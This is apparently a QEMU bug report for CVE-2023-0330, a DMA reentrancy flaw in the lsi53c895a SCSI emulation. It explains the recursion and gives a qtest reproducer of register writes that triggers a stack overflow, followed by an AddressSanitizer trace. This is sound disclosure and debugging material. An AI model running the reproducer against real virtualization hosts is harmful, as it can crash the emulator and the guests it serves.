lsi53c895a: DMA reentrancy issue leads to stack overflow (CVE-2023-0330)
Description of problem
See https://bugzilla.redhat.com/show_bug.cgi?id=2160151. The trace below shows lsi_execute_script already running (frame #29, entered from lsi_reg_writeb) when a DMA write issued by lsi_memcpy (frame #28) lands back on the controller's own MMIO registers and re-enters lsi_execute_script (frame #20); that second instance enqueues a command whose immediate completion re-enters it a third time (frame #14) via scsi_req_complete/lsi_command_complete. Nothing in this path guards against re-entry, so the recursion continues until the stack is exhausted, which is the AddressSanitizer stack-overflow reported.
Reproducer
# Start QEMU under qtest with an lsi53c810 controller and a null block backend;
# the register writes below are fed to qtest on stdin via the heredoc.
cat << EOF | ./x86_64-softmmu/qemu-system-x86_64 -machine accel=qtest \
-m 512M -machine q35 -nodefaults -device lsi53c810 -device scsi-cd,drive=null0 \
-display none -blockdev driver=null-co,node-name=null0 -qtest stdio
outl 0xcf8 0x80000804 /* PCI Command Register */
outl 0xcfc 0x7 /* Enable accesses */
outl 0xcf8 0x80000814 /* Memory Bar 1 */
outl 0xcfc 0xff100000 /* Set MMIO Address*/
outl 0xcf8 0x80000818 /* Memory Bar 2 */
outl 0xcfc 0xff000000 /* Set RAM Address*/
writel 0xff000000 0xc0000024
writel 0xff000114 0x00000080
writel 0xff00012c 0xff000000
writel 0xff000004 0xff000114
writel 0xff000008 0xff100014
writel 0xff10002f 0x000000ff
EOF
Stack trace
==3850539==ERROR: AddressSanitizer: stack-overflow on address
0x7ffeb10d5e58 (pc 0x55cd154d0f16 bp 0x7ffeb10d6690 sp 0x7ffeb10d5e60 T0)
#0 0x55cd154d0f16 in __asan_memcpy llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3
#1 0x55cd15b25676 in sparse_mem_read qemu/hw/mem/sparse-mem.c:50:9
#2 0x55cd16c973cd in memory_region_read_accessor qemu/softmmu/memory.c:440:11
#3 0x55cd16c6e9fa in access_with_adjusted_size qemu/softmmu/memory.c:554:18
#4 0x55cd16c6cf11 in memory_region_dispatch_read1 qemu/softmmu/memory.c
#5 0x55cd16c6cf11 in memory_region_dispatch_read qemu/softmmu/memory.c:1457:9
#6 0x55cd16cb9270 in flatview_read_continue qemu/softmmu/physmem.c:2892:23
#7 0x55cd16cba14f in flatview_read qemu/softmmu/physmem.c:2934:12
#8 0x55cd16cb9ee3 in address_space_read_full qemu/softmmu/physmem.c:2947:18
#9 0x55cd15ed44c5 in dma_memory_rw_relaxed qemu/include/sysemu/dma.h:87:12
#10 0x55cd15ed44c5 in dma_memory_rw qemu/include/sysemu/dma.h:130:12
#11 0x55cd15ed44c5 in pci_dma_rw qemu/include/hw/pci/pci.h:850:12
#12 0x55cd15ed44c5 in pci_dma_read qemu/include/hw/pci/pci.h:869:12
#13 0x55cd15ed44c5 in read_dword qemu/hw/scsi/lsi53c895a.c:472:5
#14 0x55cd15ed44c5 in lsi_execute_script qemu/hw/scsi/lsi53c895a.c:1154:12
#15 0x55cd15eed0e5 in lsi_command_complete qemu/hw/scsi/lsi53c895a.c:810:5
#16 0x55cd15e3d5c1 in scsi_req_complete qemu/hw/scsi/scsi-bus.c:1518:5
#17 0x55cd15e41f9c in scsi_unit_attention qemu/hw/scsi/scsi-bus.c:422:5
#18 0x55cd15e33c59 in scsi_req_enqueue qemu/hw/scsi/scsi-bus.c:890:10
#19 0x55cd15ed869c in lsi_do_command qemu/hw/scsi/lsi53c895a.c:869:9
#20 0x55cd15ed869c in lsi_execute_script qemu/hw/scsi/lsi53c895a.c:1261:13
#21 0x55cd15ece001 in lsi_reg_writeb qemu/hw/scsi/lsi53c895a.c
#22 0x55cd16c6ef86 in memory_region_write_accessor qemu/softmmu/memory.c:492:5
#23 0x55cd16c6e9fa in access_with_adjusted_size qemu/softmmu/memory.c:554:18
#24 0x55cd16c6e2fa in memory_region_dispatch_write qemu/softmmu/memory.c
#25 0x55cd16cc274c in flatview_write_continue qemu/softmmu/physmem.c:2825:23
#26 0x55cd16cba662 in flatview_write qemu/softmmu/physmem.c:2867:12
#27 0x55cd16cba3f3 in address_space_write qemu/softmmu/physmem.c:2963:18
#28 0x55cd15ed4d5c in lsi_memcpy qemu/hw/scsi/lsi53c895a.c:1104:9
#29 0x55cd15ed4d5c in lsi_execute_script qemu/hw/scsi/lsi53c895a.c:1563:13
#30 0x55cd15ece001 in lsi_reg_writeb qemu/hw/scsi/lsi53c895a.c